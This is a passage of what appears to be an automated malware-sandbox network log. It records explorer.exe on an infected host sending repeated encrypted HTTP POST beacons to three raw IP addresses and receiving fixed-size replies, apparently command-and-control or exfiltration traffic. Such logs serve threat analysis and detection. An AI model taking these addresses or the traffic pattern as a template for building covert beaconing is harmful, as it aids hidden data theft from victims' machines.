2024-07-24 17:58:25 UTC	685	IN	Data Raw: 56 6f 48 67 77 64 38 75 4f 59 44 65 74 73 41 7a 32 6d 44 53 4a 39 67 6b 6f 67 42 58 59 4d 32 6e 68 65 66 38 33 34 6c 64 56 53 71 67 36 43 75 74 6c 33 74 6e 38 33 39 67 72 58 43 4e 76 74 76 71 46 2f 6c 44 59 65 62 65 59 46 33 7a 62 79 7a 6d 61 72 63 78 79 48 58 7a 4e 32 49 65 75 65 72 7a 2f 42 63 78 59 45 70 49 59 51 79 62 77 72 39 64 53 58 4c 30 42 62 74 65 47 6d 43 76 71 67 50 6f 47 32 52 66 51 5a 75 34 34 44 44 58 61 62 2f 62 36 6d 6e 41 4b 39 6b 78 31 53 6e 75 4c 65 56 4c 79 70 6b 43 49 67 73 58 62 42 68 76 2f 31 6a 77 4e 53 32 71 4a 49 54 52 6c 39 71 32 33 30 6b 5a 70 70 4a 6d 73 72 50 42 48 2b 4b 49 37 76 79 48 6a 74 39 32 35 61 4a 77 57 53 6c 62 66 6b 52 4b 71 38 4f 32 5a 33 39 38 58 7a 57 46 35 67 50 44 4f 41 72 69 76 75 38 75 38 4a 7a 61 35 53 36 Data Ascii: VoHgwd8uOYDetsAz2mDSJ9gkogBXYM2nhef834ldVSqg6Cutl3tn839grXCNvtvqF/lDYebeYF3zbyzmarcxyHXzN2Ieuerz/BcxYEpIYQybwr9dSXL0BbteGmCvqgPoG2RfQZu44DDXab/b6mnAK9kx1SnuLeVLypkCIgsXbBhv/1jwNS2qJITRl9q230kZppJmsrPBH+KI7vyHjt925aJwWSlbfkRKq8O2Z398XzWF5gPDOArivu8u8Jza5S6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.10	49831	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:26 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:58:26 UTC	1267	OUT	Data Raw: 62 74 53 6a 4b 4b 72 66 68 76 66 78 5a 79 48 67 35 47 72 6c 42 52 39 38 52 30 30 65 36 42 32 75 45 56 4e 67 45 6e 4e 46 47 64 48 70 2b 30 33 61 36 2b 5a 77 67 4c 68 6a 78 70 62 69 42 47 68 7a 5a 51 4e 6a 43 50 76 75 4f 79 37 71 37 2f 68 49 6c 44 6e 6f 6b 64 69 35 36 5a 4a 35 6a 76 35 5a 7a 34 56 70 6a 46 65 69 47 30 4b 77 44 69 31 58 37 7a 53 6d 44 6e 71 2f 6c 4a 4f 37 56 64 6e 73 33 76 72 59 53 6d 39 49 30 57 4d 62 4c 56 4c 7a 51 47 79 6d 47 30 79 59 32 33 36 68 58 42 64 2b 61 33 41 2b 70 33 43 73 4d 4a 51 73 51 32 76 61 4a 76 51 51 58 4b 4e 7a 75 32 69 2f 51 74 72 6c 6e 78 65 49 33 4b 52 31 6a 75 79 46 76 68 6a 4c 6e 63 46 2b 68 64 2b 49 68 4a 6b 36 50 2b 56 33 74 78 47 33 62 56 46 6e 6c 30 61 6e 65 42 5a 4d 54 4f 4d 45 4a 72 4c 6d 53 35 48 46 37 71 66 Data Ascii: btSjKKrfhvfxZyHg5GrlBR98R00e6B2uEVNgEnNFGdHp+03a6+ZwgLhjxpbiBGhzZQNjCPvuOy7q7/hIlDnokdi56ZJ5jv5Zz4VpjFeiG0KwDi1X7zSmDnq/lJO7Vdns3vrYSm9I0WMbLVLzQGymG0yY236hXBd+a3A+p3CsMJQsQ2vaJvQQXKNzu2i/QtrlnxeI3KR1juyFvhjLncF+hd+IhJk6P+V3txG3bVFnl0aneBZMTOMEJrLmS5HF7qf
2024-07-24 17:58:28 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:27 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:28 UTC	685	IN	Data Raw: 52 49 2b 42 56 5a 6a 4e 66 55 73 44 50 78 65 58 6b 74 39 68 4f 68 53 7a 48 43 49 41 57 65 46 6c 77 4f 5a 6a 70 34 6d 54 39 5a 6f 67 71 37 44 36 78 6c 6c 31 62 6e 2b 32 74 67 53 4b 4d 32 66 31 49 32 4e 65 73 62 69 56 42 66 2f 57 50 34 67 36 2b 6a 6f 4c 72 34 6e 38 34 48 61 69 37 6e 74 64 45 2f 61 70 59 4e 41 52 47 43 35 47 4f 67 55 47 2f 6e 49 52 6d 6b 30 6a 73 48 73 68 47 2b 45 51 30 31 72 48 44 32 65 58 71 64 57 77 46 30 74 4a 58 72 39 55 78 5a 30 74 77 35 6b 4b 6a 74 49 45 41 62 69 79 6f 64 57 73 32 35 61 42 78 6d 38 74 55 68 47 51 37 43 35 36 31 34 4d 58 74 4b 39 70 41 75 5a 4b 6b 65 5a 42 45 4b 66 2f 66 7a 38 6f 37 69 34 51 47 71 4d 65 73 50 35 2f 46 56 51 49 7a 48 4c 62 42 33 30 41 54 34 33 6d 31 30 2f 48 68 6d 6d 47 35 74 50 53 5a 4d 68 65 73 39 65 Data Ascii: RI+BVZjNfUsDPxeXkt9hOhSzHCIAWeFlwOZjp4mT9Zogq7D6xll1bn+2tgSKM2f1I2NesbiVBf/WP4g6+joLr4n84Hai7ntdE/apYNARGC5GOgUG/nIRmk0jsHshG+EQ01rHD2eXqdWwF0tJXr9UxZ0tw5kKjtIEAbiyodWs25aBxm8tUhGQ7C5614MXtK9pAuZKkeZBEKf/fz8o7i4QGqMesP5/FVQIzHLbB30AT43m10/HhmmG5tPSZMhes9e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.10	49832	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:28 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:28 UTC	1122	OUT	Data Raw: 70 75 6e 6f 4d 54 53 64 6e 4f 47 56 6d 4a 68 43 4f 62 6f 39 7a 2f 71 48 34 47 73 6d 6e 64 5a 4f 4b 4d 59 6c 5a 67 67 71 72 6d 66 7a 32 50 6f 6a 76 6b 75 59 49 39 6c 32 78 30 56 75 70 49 71 7a 51 71 6f 38 39 42 39 6e 62 61 4a 4d 53 46 2b 59 47 48 6a 4e 4a 4a 36 61 54 53 6a 64 47 4c 47 5a 4b 78 73 6f 30 74 36 6c 51 69 44 69 63 68 75 64 77 4e 36 2f 46 6e 46 36 4a 6b 2f 7a 6a 66 44 53 71 6d 33 74 64 43 62 65 77 30 52 46 69 6f 55 7a 52 69 43 71 39 57 43 51 2f 53 30 6b 48 54 59 31 5a 44 51 57 66 4e 42 51 2b 75 44 7a 57 4f 2f 4c 73 4e 32 6d 66 64 68 53 54 63 6e 6e 63 6f 6d 72 6c 43 46 78 52 78 7a 58 54 54 49 36 2b 39 62 5a 32 45 71 63 59 65 61 6b 75 36 55 57 39 38 6a 59 6b 41 66 55 73 52 39 38 47 39 48 4d 32 4c 50 6e 56 51 53 77 38 72 77 52 53 68 73 54 38 73 36 Data Ascii: punoMTSdnOGVmJhCObo9z/qH4GsmndZOKMYlZggqrmfz2PojvkuYI9l2x0VupIqzQqo89B9nbaJMSF+YGHjNJJ6aTSjdGLGZKxso0t6lQiDichudwN6/FnF6Jk/zjfDSqm3tdCbew0RFioUzRiCq9WCQ/S0kHTY1ZDQWfNBQ+uDzWO/LsN2mfdhSTcnncomrlCFxRxzXTTI6+9bZ2EqcYeaku6UW98jYkAfUsR98G9HM2LPnVQSw8rwRShsT8s6
2024-07-24 17:58:30 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:30 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:30 UTC	685	IN	Data Raw: 42 32 54 77 4b 56 46 66 6b 36 32 6e 37 71 63 68 37 39 58 45 42 30 77 69 50 49 70 30 56 62 4a 4a 43 31 77 48 58 78 46 41 4c 75 6f 42 65 69 4a 74 36 78 32 47 4a 6d 33 75 54 77 78 68 36 44 35 4d 41 4c 76 78 2b 30 59 64 71 77 35 41 4f 6f 7a 4c 4e 4e 30 32 4f 47 6c 42 65 34 35 4f 42 4b 68 5a 4d 63 30 61 78 44 2b 35 49 44 55 45 33 4b 72 6c 64 31 59 51 47 61 48 36 47 49 66 45 49 6f 78 49 32 52 49 77 61 65 31 6d 48 63 45 39 2b 4c 5a 41 43 59 50 54 57 65 70 79 44 78 31 5a 42 49 6c 4c 64 4a 54 42 41 51 75 74 43 35 62 55 70 2f 6e 6b 6b 44 6f 6b 65 4d 74 43 71 69 68 71 37 4b 65 70 57 32 4a 48 62 4d 43 6d 31 72 64 32 54 4b 36 66 64 4d 46 48 4b 58 59 41 56 51 68 38 56 2b 45 53 39 73 52 43 30 32 4f 76 56 6c 2f 42 67 65 6c 4f 52 50 48 38 77 39 35 4a 2b 37 65 2b 6e 74 55 Data Ascii: B2TwKVFfk62n7qch79XEB0wiPIp0VbJJC1wHXxFALuoBeiJt6x2GJm3uTwxh6D5MALvx+0Ydqw5AOozLNN02OGlBe45OBKhZMc0axD+5IDUE3Krld1YQGaH6GIfEIoxI2RIwae1mHcE9+LZACYPTWepyDx1ZBIlLdJTBAQutC5bUp/nkkDokeMtCqihq7KepW2JHbMCm1rd2TK6fdMFHKXYAVQh8V+ES9sRC02OvVl/BgelORPH8w95J+7e+ntU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.10	49834	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:31 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:31 UTC	1122	OUT	Data Raw: 45 39 67 61 7a 38 75 56 6c 39 7a 56 79 49 56 42 59 39 78 43 43 4d 5a 4b 37 42 56 42 2b 4f 37 35 32 43 45 41 54 59 4e 6e 36 4e 64 79 72 64 72 4a 69 6b 44 6c 50 6a 4d 76 55 70 62 4c 43 41 33 67 4e 43 44 56 66 41 6a 6a 63 32 6c 64 2b 5a 4c 43 38 57 79 63 77 7a 58 42 70 31 37 66 53 6c 41 6e 30 70 63 77 31 4f 70 5a 35 70 61 62 75 69 67 61 7a 34 73 73 43 39 70 46 55 39 63 59 63 59 61 6c 7a 32 45 5a 56 66 33 2b 6c 37 37 4c 50 4c 74 77 63 31 77 4c 38 65 43 37 42 32 2b 64 2b 34 46 39 71 2b 57 55 6d 7a 72 62 55 72 34 61 68 76 71 65 77 72 51 41 52 50 5a 49 67 6d 2f 30 62 6c 63 52 4d 33 4c 6e 48 7a 65 43 5a 69 77 33 38 33 59 54 6f 5a 48 2f 35 4a 63 6e 64 75 41 77 54 55 51 46 4a 6a 31 4f 65 34 54 38 6d 36 66 50 6e 59 2f 73 32 74 49 35 42 72 77 49 4f 55 73 4f 61 43 38 Data Ascii: E9gaz8uVl9zVyIVBY9xCCMZK7BVB+O752CEATYNn6NdyrdrJikDlPjMvUpbLCA3gNCDVfAjjc2ld+ZLC8WycwzXBp17fSlAn0pcw1OpZ5pabuigaz4ssC9pFU9cYcYalz2EZVf3+l77LPLtwc1wL8eC7B2+d+4F9q+WUmzrbUr4ahvqewrQARPZIgm/0blcRM3LnHzeCZiw383YToZH/5JcnduAwTUQFJj1Oe4T8m6fPnY/s2tI5BrwIOUsOaC8
2024-07-24 17:58:32 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:32 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:32 UTC	685	IN	Data Raw: 46 4e 5a 67 39 55 4e 44 72 70 4c 39 57 51 56 44 32 63 6b 56 58 5a 6f 54 34 45 44 74 4b 70 72 39 6f 68 42 38 77 45 65 34 31 4b 7a 31 6c 78 6c 78 6e 61 6c 62 47 61 58 75 59 38 59 50 65 31 46 45 66 56 34 33 36 6f 4a 5a 33 59 68 64 5a 72 47 51 51 76 39 58 6e 31 50 2f 70 5a 50 51 34 6a 51 39 61 51 5a 59 76 64 74 48 4e 4d 31 43 63 37 2b 65 36 56 56 2f 53 67 31 4e 58 52 54 68 30 57 37 4c 71 5a 41 7a 49 6e 56 79 66 69 39 70 7a 37 64 4b 51 30 48 75 76 34 4c 4c 39 69 5a 37 53 57 55 30 66 6d 73 63 70 44 56 66 63 47 31 47 41 49 42 6f 73 70 59 54 77 33 33 54 57 51 59 6c 74 33 71 43 62 68 6d 72 31 48 6c 44 37 2b 71 36 73 7a 55 74 73 73 4c 4f 55 6b 77 50 6a 76 4e 75 77 54 4d 37 78 64 57 71 75 49 51 64 70 2f 69 6d 77 61 65 43 4f 71 52 55 4c 66 63 56 55 65 6b 54 51 49 67 Data Ascii: FNZg9UNDrpL9WQVD2ckVXZoT4EDtKpr9ohB8wEe41Kz1lxlxnalbGaXuY8YPe1FEfV436oJZ3YhdZrGQQv9Xn1P/pZPQ4jQ9aQZYvdtHNM1Cc7+e6VV/Sg1NXRTh0W7LqZAzInVyfi9pz7dKQ0Huv4LL9iZ7SWU0fmscpDVfcG1GAIBospYTw33TWQYlt3qCbhmr1HlD7+q6szUtssLOUkwPjvNuwTM7xdWquIQdp/imwaeCOqRULfcVUekTQIg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.10	49835	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:33 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:33 UTC	1122	OUT	Data Raw: 59 58 52 75 47 38 39 48 46 70 37 32 76 6d 5a 51 47 52 75 75 69 34 6d 68 34 45 38 45 36 48 49 4c 4a 6b 4d 61 64 7a 76 2f 79 41 69 49 6f 63 52 50 6a 63 75 43 75 65 4e 42 63 56 67 67 6b 55 64 4b 77 6d 31 77 45 6f 47 61 71 6d 44 78 42 5a 4c 2f 69 55 32 77 74 34 66 32 32 51 7a 78 61 36 36 39 4c 51 6e 5a 79 74 6f 58 49 54 71 6a 78 6e 71 48 48 5a 64 61 72 39 4a 57 47 42 56 62 36 41 36 50 2f 71 4a 4c 59 6c 30 4f 37 47 7a 39 67 37 42 56 31 4b 36 4f 6d 62 4a 56 53 6f 78 53 31 38 38 45 46 64 4e 74 61 2b 39 77 56 55 54 79 57 50 62 39 39 4f 67 64 36 49 6e 55 4e 30 71 5a 32 35 61 6b 44 54 49 44 48 73 6a 30 74 66 4e 63 5a 71 69 65 30 46 2b 4f 35 54 32 6b 61 39 36 4b 43 33 58 31 67 36 59 61 55 6c 4e 45 4f 36 51 59 69 6c 76 6f 54 62 44 6f 59 56 78 70 4a 46 54 72 7a 44 4e Data Ascii: YXRuG89HFp72vmZQGRuui4mh4E8E6HILJkMadzv/yAiIocRPjcuCueNBcVggkUdKwm1wEoGaqmDxBZL/iU2wt4f22Qzxa669LQnZytoXITqjxnqHHZdar9JWGBVb6A6P/qJLYl0O7Gz9g7BV1K6OmbJVSoxS188EFdNta+9wVUTyWPb99Ogd6InUN0qZ25akDTIDHsj0tfNcZqie0F+O5T2ka96KC3X1g6YaUlNEO6QYilvoTbDoYVxpJFTrzDN
2024-07-24 17:58:35 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:34 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:35 UTC	685	IN	Data Raw: 63 34 66 63 4e 58 33 49 66 66 6a 77 33 38 39 2b 6d 6a 47 55 6d 41 79 53 48 42 4c 6a 51 47 44 61 78 70 70 77 2f 64 4e 59 5a 5a 78 69 41 44 49 5a 45 41 67 53 2f 4f 73 34 44 50 32 44 2f 51 54 57 4a 73 6b 6a 59 77 63 71 54 65 44 43 65 4b 79 2b 44 46 4b 34 45 47 47 77 73 49 57 45 67 64 63 50 79 48 32 35 53 41 79 30 43 49 30 41 34 36 64 50 32 58 66 35 48 4d 78 49 6c 58 70 50 71 49 6c 46 75 71 75 47 75 72 6a 36 6e 42 68 39 6d 79 4b 31 45 44 61 6a 4f 41 34 4c 42 34 78 49 59 53 43 72 55 75 6b 6e 38 61 32 4d 76 35 76 59 6f 54 38 30 69 77 61 4c 67 42 66 74 61 78 2f 34 64 67 41 61 42 6d 7a 79 46 7a 46 48 6c 50 75 78 71 37 52 46 5a 75 79 59 6a 32 61 68 44 74 71 6e 69 6a 71 4d 2b 35 58 36 69 5a 70 33 61 7a 49 7a 71 32 6b 6e 43 62 5a 4e 4b 6a 55 56 56 48 77 76 78 50 49 Data Ascii: c4fcNX3Iffjw389+mjGUmAySHBLjQGDaxppw/dNYZZxiADIZEAgS/Os4DP2D/QTWJskjYwcqTeDCeKy+DFK4EGGwsIWEgdcPyH25SAy0CI0A46dP2Xf5HMxIlXpPqIlFuquGurj6nBh9myK1EDajOA4LB4xIYSCrUukn8a2Mv5vYoT80iwaLgBftax/4dgAaBmzyFzFHlPuxq7RFZuyYj2ahDtqnijqM+5X6iZp3azIzq2knCbZNKjUVVHwvxPI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.10	49836	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:35 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:35 UTC	1122	OUT	Data Raw: 59 43 63 57 4a 34 74 5a 55 4d 46 70 39 39 2b 53 66 49 62 6c 6d 51 31 44 32 6f 56 44 76 46 36 7a 4e 6c 30 76 76 2b 76 68 71 4c 74 6b 4c 4e 4a 30 52 51 74 34 41 67 75 78 33 69 67 61 70 6b 64 39 39 2b 77 71 4c 73 32 32 2f 54 6d 58 39 6e 53 6b 4e 42 42 76 30 2b 73 69 2b 42 75 64 44 74 52 6e 74 47 5a 75 57 47 4c 6f 56 55 66 56 38 55 68 35 69 64 4e 46 73 65 31 77 4b 79 52 69 6a 63 59 6d 36 64 7a 35 64 69 6c 39 38 49 30 37 4d 32 53 54 78 43 63 43 48 4a 65 50 73 78 35 56 47 67 62 64 58 4f 37 33 6f 7a 42 59 50 63 4e 62 6d 6d 38 70 4a 73 44 73 6b 38 39 56 4b 63 2f 74 65 4d 2f 38 4b 57 38 41 6f 39 6b 4f 49 6c 67 47 74 67 75 78 77 6e 78 65 52 4d 37 39 36 78 4f 49 47 71 31 41 56 36 78 5a 74 36 54 76 2b 34 6a 59 67 61 59 76 38 4e 72 46 6a 56 67 73 43 44 6e 6c 41 34 44 Data Ascii: YCcWJ4tZUMFp99+SfIblmQ1D2oVDvF6zNl0vv+vhqLtkLNJ0RQt4Agux3igapkd99+wqLs22/TmX9nSkNBBv0+si+BudDtRntGZuWGLoVUfV8Uh5idNFse1wKyRijcYm6dz5dil98I07M2STxCcCHJePsx5VGgbdXO73ozBYPcNbmm8pJsDsk89VKc/teM/8KW8Ao9kOIlgGtguxwnxeRM796xOIGq1AV6xZt6Tv+4jYgaYv8NrFjVgsCDnlA4D
2024-07-24 17:58:37 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:37 UTC	685	IN	Data Raw: 52 70 6c 4e 4b 54 73 73 34 37 65 44 48 69 74 65 37 4c 74 6e 7a 42 52 33 51 4a 72 4b 37 34 65 4b 61 59 6d 47 4c 6d 63 43 65 45 36 79 47 7a 5a 36 6c 7a 4e 44 58 76 46 41 57 31 59 53 2f 34 5a 71 65 43 78 71 7a 6b 47 4a 76 4a 34 2b 73 78 58 42 78 50 51 43 62 65 35 4b 78 59 64 38 4f 36 6e 34 74 50 2b 38 4b 37 41 52 46 66 41 4e 45 57 75 73 61 49 5a 57 4c 61 2f 6f 76 71 46 57 68 54 76 43 4d 44 35 2b 64 6a 62 6c 70 71 34 44 61 6c 38 6a 34 37 79 74 67 51 63 6e 72 6e 72 35 54 42 4f 76 75 42 7a 63 52 36 44 74 57 66 75 38 2b 37 64 4d 39 35 4e 6f 38 30 4a 67 63 37 48 76 71 4e 33 4b 54 37 43 55 61 66 69 55 4c 73 5a 39 52 74 51 46 2f 4b 65 5a 6a 33 44 41 55 72 4e 41 4f 77 77 50 66 32 39 70 2b 53 66 2b 6c 61 45 33 68 61 67 39 68 51 32 30 55 74 4f 56 66 67 41 56 47 36 59 Data Ascii: RplNKTss47eDHite7LtnzBR3QJrK74eKaYmGLmcCeE6yGzZ6lzNDXvFAW1YS/4ZqeCxqzkGJvJ4+sxXBxPQCbe5KxYd8O6n4tP+8K7ARFfANEWusaIZWLa/ovqFWhTvCMD5+djblpq4Dal8j47ytgQcnrnr5TBOvuBzcR6DtWfu8+7dM95No80Jgc7HvqN3KT7CUafiULsZ9RtQF/KeZj3DAUrNAOwwPf29p+Sf+laE3hag9hQ20UtOVfgAVG6Y

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.10	49837	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:38 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:38 UTC	1122	OUT	Data Raw: 68 6e 4c 31 31 6e 4c 55 43 57 48 42 50 72 49 66 4e 67 50 74 4c 37 6d 75 69 51 45 5a 74 75 72 73 37 50 73 47 4c 69 52 7a 70 33 41 45 49 49 69 32 4f 54 62 4b 4c 6a 79 32 46 6c 6f 65 68 7a 5a 51 44 53 6a 63 59 30 43 2f 6a 78 74 47 7a 61 76 4a 61 37 42 46 78 45 47 45 41 6b 30 75 76 72 52 65 51 76 39 56 65 30 43 63 73 38 6e 74 6e 31 4b 2f 34 44 61 68 49 36 62 39 6f 51 2b 6c 76 4c 45 58 7a 6b 61 49 64 35 48 67 47 52 64 48 6e 6d 6a 43 6d 30 7a 55 61 72 2f 47 4f 2b 78 6b 48 61 53 6d 4c 50 56 5a 6e 66 43 71 45 34 46 52 30 74 77 30 41 47 50 5a 35 73 58 77 47 58 76 6d 44 48 68 77 4f 78 4a 77 44 76 70 4c 56 56 2b 67 6c 5a 58 4f 2b 2b 4a 55 6e 32 53 38 6f 68 53 35 43 46 38 75 65 53 6b 79 6e 79 4f 79 79 43 2b 4e 7a 2f 79 54 35 78 2f 2f 39 50 33 63 71 65 44 38 37 31 69 Data Ascii: hnL11nLUCWHBPrIfNgPtL7muiQEZturs7PsGLiRzp3AEIIi2OTbKLjy2FloehzZQDSjcY0C/jxtGzavJa7BFxEGEAk0uvrReQv9Ve0Ccs8ntn1K/4DahI6b9oQ+lvLEXzkaId5HgGRdHnmjCm0zUar/GO+xkHaSmLPVZnfCqE4FR0tw0AGPZ5sXwGXvmDHhwOxJwDvpLVV+glZXO++JUn2S8ohS5CF8ueSkynyOyyC+Nz/yT5x//9P3cqeD871i
2024-07-24 17:58:39 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:39 UTC	685	IN	Data Raw: 4e 68 44 4e 6e 68 76 6b 31 45 75 6c 55 49 38 64 6f 50 44 73 42 6d 4e 73 4d 31 32 4b 76 46 6b 6f 34 64 4b 30 68 48 4c 77 50 66 4a 65 65 75 38 50 31 43 68 38 2b 52 44 50 46 47 7a 42 79 66 45 79 6a 51 49 4d 37 43 39 33 73 65 59 46 75 76 54 57 35 61 41 64 4a 4e 52 44 74 35 77 71 42 6a 6a 49 30 2f 52 31 4c 74 53 37 31 49 75 35 75 75 50 41 51 34 67 79 4d 4b 54 54 2b 52 52 2f 61 31 50 54 58 42 35 69 43 51 58 49 68 6c 2b 6b 50 34 49 70 2b 74 65 38 43 7a 49 30 34 64 75 6b 34 71 6a 4f 6f 64 49 4a 2b 39 6d 59 50 49 6e 78 63 49 6c 37 4b 66 53 30 63 55 41 42 72 6c 70 30 55 69 64 59 78 59 72 78 64 63 59 69 55 6a 52 67 59 6a 5a 53 43 65 35 6c 78 44 46 5a 43 54 58 37 69 67 70 61 62 55 57 78 74 77 69 48 69 65 2b 56 66 50 4b 50 4b 78 72 68 77 6b 2b 4e 68 32 48 6a 5a 45 44 Data Ascii: NhDNnhvk1EulUI8doPDsBmNsM12KvFko4dK0hHLwPfJeeu8P1Ch8+RDPFGzByfEyjQIM7C93seYFuvTW5aAdJNRDt5wqBjjI0/R1LtS71Iu5uuPAQ4gyMKTT+RR/a1PTXB5iCQXIhl+kP4Ip+te8CzI04duk4qjOodIJ+9mYPInxcIl7KfS0cUABrlp0UidYxYrxdcYiUjRgYjZSCe5lxDFZCTX7igpabUWxtwiHie+VfPKPKxrhwk+Nh2HjZED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.10	49838	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:40 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:40 UTC	1122	OUT	Data Raw: 68 36 30 53 30 55 61 6f 58 61 34 30 72 42 63 59 2b 2f 4e 58 77 73 30 54 37 71 6a 58 55 79 4f 43 59 39 44 31 68 4b 53 2f 41 65 34 6d 47 31 59 6b 55 57 50 37 55 75 43 6c 4d 53 63 56 54 65 41 58 66 73 41 67 72 2f 58 7a 6c 66 49 6b 59 63 2b 30 30 61 74 35 2f 72 47 48 66 41 50 7a 4d 41 59 6e 45 4b 69 36 71 58 64 59 46 41 4f 31 4d 55 5a 5a 75 79 41 61 72 6e 50 33 4f 32 78 41 62 74 30 56 4d 4e 41 76 78 43 66 62 7a 36 4d 6d 53 36 2f 4f 36 47 78 41 55 31 31 4b 72 48 52 5a 6a 38 6e 57 58 6b 61 44 72 4c 75 48 34 70 6f 71 74 79 2f 55 43 30 53 67 2f 37 6f 63 7a 76 74 43 47 52 6b 4b 77 51 6c 32 70 4e 2b 63 61 33 53 5a 64 52 56 59 66 4e 62 43 67 32 35 4b 6d 70 34 2f 58 33 78 34 72 49 79 43 6f 33 33 4a 6c 2f 64 66 74 69 76 41 79 33 2b 55 32 31 59 46 54 46 4f 39 31 41 53 Data Ascii: h60S0UaoXa40rBcY+/NXws0T7qjXUyOCY9D1hKS/Ae4mG1YkUWP7UuClMScVTeAXfsAgr/XzlfIkYc+00at5/rGHfAPzMAYnEKi6qXdYFAO1MUZZuyAarnP3O2xAbt0VMNAvxCfbz6MmS6/O6GxAU11KrHRZj8nWXkaDrLuH4poqty/UC0Sg/7oczvtCGRkKwQl2pN+ca3SZdRVYfNbCg25Kmp4/X3x4rIyCo33Jl/dftivAy3+U21YFTFO91AS
2024-07-24 17:58:41 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:41 UTC	685	IN	Data Raw: 63 47 7a 74 4a 7a 77 4a 7a 32 6c 39 2f 47 6a 76 2b 30 31 6a 77 48 2b 49 34 43 32 7a 4c 52 67 6c 6f 76 50 51 35 55 4f 63 57 4e 63 4f 48 66 73 62 2b 44 58 45 55 41 75 37 48 57 72 56 6b 4a 41 68 67 57 65 42 7a 77 4d 43 4e 65 63 51 48 39 54 33 68 63 61 47 2b 53 6e 79 56 42 59 41 79 36 4d 52 67 38 42 71 42 59 6e 71 4c 77 66 57 6c 58 58 53 30 48 53 38 6f 31 42 69 44 46 46 52 2b 37 75 45 2b 71 7a 75 55 47 6b 73 52 50 2f 32 37 77 57 6f 42 79 71 72 38 42 72 36 51 53 68 31 5a 50 71 46 34 47 5a 72 45 73 6b 62 6a 65 34 34 32 48 65 41 59 61 44 58 37 6c 4c 6e 35 77 73 72 6c 4c 5a 50 34 66 73 49 44 70 4a 67 4d 65 65 77 7a 6e 6e 55 74 6a 7a 5a 6c 4c 62 66 35 78 74 43 46 56 55 75 62 72 33 64 39 57 74 54 55 55 7a 46 77 6b 50 46 6c 53 6b 77 57 31 76 78 4e 56 32 61 49 51 44 Data Ascii: 